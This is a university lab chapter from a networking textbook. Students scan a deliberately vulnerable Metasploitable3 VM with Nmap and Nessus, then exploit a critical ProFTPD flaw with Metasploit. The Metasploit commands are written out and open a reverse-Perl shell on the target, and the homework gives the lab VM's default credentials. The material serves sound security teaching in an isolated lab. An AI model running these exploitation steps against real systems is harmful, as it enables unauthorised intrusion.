45 Scanning and Enumeration – Vulnerability Scanning

Mathew J. Heath Van Horn, PhD

This lab helps students become familiar with the Nessus vulnerability scanner and how it can be used to find vulnerabilities to exploit on a network.  Nessus by Tenable has been used in the industry for over 25 years.  It is updated weekly with new exploits by the Common Vulnerabilities and Exposures (CVE) database.

Learning Objectives

  • Perform a vulnerability scan of a vulnerable target using Nessus
  • Read and investigate ways to take advantage of detected vulnerabilities
  • Exploit a critical vulnerability using Metasploit

Prerequisites

Deliverables

  • 4 Screenshots are required
    • Nmap scan of the target network that identifies the target machine
    • Results of a completed Nessus advanced scan of the target machine
    • A Nessus report of the critical vulnerability
    • Metasploitable report of the module that can be used against the vulnerability

Resources

Contributors and Testers

  • An idea proposed by Raechel Ferguson
  • Dante Rocca, Cybersecurity Student, ERAU-Prescott

Phase I – Install Nessus

Nessus has continuous updates.  If you skipped the Nessus installation from Chapter 12, you will need to do this now.  If you haven’t updated Nessus recently, you must complete the following steps. These steps are based on your prior knowledge from completing Section 1 of this book.

  1. Open the virtual box manager and select the Kali VM
  2. Click on settings, click on network, and make sure it is attached to NAT
    Changing network settings on Kali VM
    Figure 1 – Changing the network settings of the Kali VM
  3. Press OK and start the Kali VM
  4. From the command line, start Nessus with the following command

    > systemctl start nessusd.service

  5. Open the Nessus user interface by opening Firefox and going to this URL. It may say it is insecure but click advanced and accept the risk to continue

    https://kali:8834/

  6. Click on About –> Software Update –> Manual Software Update
  7. Click on Update all components then continue
    Updating Nessus
    Figure 2 – Updating Nessus
  8. Let the software update.  This could take a while depending on the last time your Kali VM had access to the Internet
  9. Once the update has been completed, power off the Kali VM
  10. Return back to the Oracle VM manager and on the Kali VM switch the network card back to the generic adapter
    Kali VM switching the NIC to generic driver
    Figure 3 – Switching NIC back to generic driver

Phase II – Running a Nessus Scan Against Metasploitable

Nessus is a popular vulnerability scanner that can detect vulnerabilities running on devices. This is useful for defensive purposes to detect areas of weakness but can be used by attackers to find holes in the network.

  1. Open GNS3 workspace and wait for the green lights
  2. Start the following machines:
    • DHCP Server
    • Router
    • Kali VM
    • Metasploitable3-Linux
  3. Once all machines are running, find the IP address of the Metasploitable3-Linux box by running a Nmap scan on the 200.200.200.0/24 network from the Kali VM.  In this example, the target has an IP address of 200.200.200.7

    > sudo nmap -O 200.200.200.0/24

  4. Once you have the IP, start Nessus with the following command

    > systemctl start nessusd.service

  5. Open the interface by opening Firefox and going to this URL. It will say it is insecure but click advanced and accept the risk to continue

    https://kali:8834/

  6. Login to Nessus
  7. Click on New Scan
    New Scan Nessus
    Figure 4 – New Scan
  8. Click on Advanced Scan
    Select advanced scan
    Figure 5 – Create a new advanced scan
  9. Complete the scan details
    • NAME – Meta3-Linux
    • DESCRIPTION – Scan of metasploitable3 linux VM
    • FOLDER – My Scans
    • TARGETS – 200.200.200.7
      Configuring settings
      Figure 6 – Configuring the scan details
  10. Click on Save
  11. Hit the play button on the right-hand side of the scan to start it. This will take a bit of time
    Start Nessus Scan
    Figure 7 – Start Nessus scan on our target
    Sleeping 0
    Figure Zzzzzz
  12. Once the scan begins, you can double-click on the scan and watch the progress
    Nessus in progress
    Figure 8 – Nessus running a scan of our target
  13. Once the scan reports on vulnerabilities, you can double-click on the progress bar and it will show you a list of detected vulnerabilities
    Reported vulnerabilties
    Figure 9 – Reported vulnerabilities
  14. You can then double-click on any of the vulnerabilities and receive more information on the vulnerability.  In this figure, we clicked on one of the Mixed results to see more of the results
    Look at more details of the detected vulnerability
    Figure 10 – Details of exploits
  15. Then you can double-click on any exploit to get more detailed information as well
    Details of the vulnerability
    Figure 11 – Even more details of the vulnerability
  16. It took about 15 minutes for the scan to complete.  Your results will vary.  However, we can see that several vulnerabilities were detected including some critical vulnerabilities that need immediate attention
    Vulnerability scan complete
    Figure 12 – Nessus vulnerability scan completed
  17. Let’s investigate the critical vulnerability a bit further
    Critical vulnerability
    Figure 13 – Critical Vulnerability
    Vulnerability details
    Figure 14 – FTP vulnerability details

Phase III – Making Use of the Information

Finding vulnerabilities is only part of the process. There are many ways to exploit vulnerabilities, which we will share in the following chapters, but for now, we don’t want to leave you hanging.  So we introduce an easy way to exploit this vulnerability so that you can close the loop on the process.

The Metasploit Framework is a tool for developing and expecting exploit code against targets.  It also includes anti-forensic and evasion tools.  It is preinstalled in Kali and we can leverage it quickly against our target machine.  Metasploitable3 was developed to practice Metasploit attacks.

NOTE: Phase III was written separately from Phases I and II.  The target machine’s IP address changed from 200.200.200.7 to 200.200.200.8 due to DHCP.

  1. The exploit report included this in the description.  We are going to use this information to our advantage
    Exploit is known by Metasploit
    Figure 15 – Nessus tells us how Metasploit can take advantage of the vulnerability
  2. Open a terminal and run an Nmap scan directly on our target machine and use the -sS (TCP Syn) -sV (port probe) flags to identify the FTP service port

    > sudo nmap -sS -sV 200.200.200.8

  3. We can see that port 21 matches the exploit identified by Nessus in Figure 14 above and has been known to be successfully attacked by Metasploit in the past in Figure 15 above
    Port 21 matches the Nessus
    Figure 16 – Nmap port 21 matches Nessus scan
  4. Open Metasploit at the command line prompt

    > msfconsole

  5. Now search for the FTP exploit by typing

    > search ProFTPD

  6. You can see that we get six results, but only one of them is for our version
    Search for the exploit
    Figure 17 – Search for instances of ProFTPD exploit
  7. Now follow the directions on the screen and type

    > info 4

  8. We can see that using this exploit allows us to copy any file to the target machine’s website among other things
    Description of what this exploit allows us to do
    Figure 18 – Details about the usable exploit
  9. This looks good to us, so type

    > use 4

  10. We haven’t set our payload yet, so it will assign a default one and remind us of it at the command prompt
    Look at available payloads
    Figure 19 – Our default payload is being assigned
  11. We can view our settings for our custom attack on the target by typing

    > show options

  12. We are still missing some information in our current settings
    Checking our settings
    Figure 20 – Checking our settings and spotting some missing information
  13. Let us set our target as the remote host by typing

    > set rhosts 200.200.200.8

  14. The sitepath is from a previous version, so update this by typing

    > set sitepath /var/www/html

  15. Doublecheck the changes took effect and type

    > show options

     

    Verify changes took place
    Figure 21 – Checking the changes took place
  16. We can now set the payload.  See the various payload options by typing

    > show payloads

     

    Setting the payload
    Figure 22 – Showing and setting the payload
  17. Sometimes you have to try different payloads to see which are effective, but reverse_perl works for us

    > set payload 10

  18. Now we can run our exploit by typing

    > exploit

  19. We can see that a command shell has been opened on our target machine.
    Performing the exploit
    Figure 23 – executing the exploit on our target
  20. We can now run commands as if we were using our target machine

    > ip add

  21. We see that we are in the target machine
    Performing commands
    Figure 24 – command “ip add” shows that we are ‘in’
  22. We can also view our directory and list the files in that directory

    > pwd

    > ls

    Executing various commands
    Figure 25 – Viewing our directory and files
  23. Go ahead and poke about the system and see what else you can discover
End of Lab

Deliverables

4 Screenshots are required

  • Nmap scan of the target network that identifies the target machine
  • Results of a completed Nessus advanced scan of the target machine
  • A Nessus report of the critical vulnerability
  • Metasploitable report of the module that can be used against the vulnerability

Homeworks

Assignment 1 – Advanced scan with creds

The previous crew discovered the username and password of the target machine.  Use the Nessus documentation to conduct an advanced scan using the SSH credentials: USERNAME: vagrant PASSWORD: vagrant. Identify any previously unknown critical vulnerabilities, produce the Nessus details on the vulnerability, and select a possible Metasploit package that could be used for each new vulnerability.

RECOMMENDED GRADING CRITERIA:

  • Screenshot of the Nessus Vulnerability Report
  • Screenshot of the Nessus details for each previously unknown critical vulnerability
  • Screenshot of one possible Metasploit module that could be used against each critical vulnerability

Assignment 2 – Advanced scan, with creds, against Windows

Start the Metasploitable3-Windows VM.  Use the same credentials from assignment 1 to run an advanced scan against the Meta3-Windows VM to identify all critical vulnerabilities that are unique to Windows machines.  Produce the Nessus details on each vulnerability and select a possible Metasploit package that could be used for each vulnerability

RECOMMENDED GRADING CRITERIA:

  • Screenshot of the Nessus Vulnerability Report
  • Screenshot of the Nessus details for each Windows-based critical vulnerability
  • Screenshot of one possible Metasploit module that could be used against each critical vulnerability

 

Figures for Printed Version

License

Icon for the Creative Commons Attribution 4.0 International License

Mastering Enterprise Networks Copyright © 2024 by Mathew J. Heath Van Horn, PhD is licensed under a Creative Commons Attribution 4.0 International License, except where otherwise noted.

Share This Book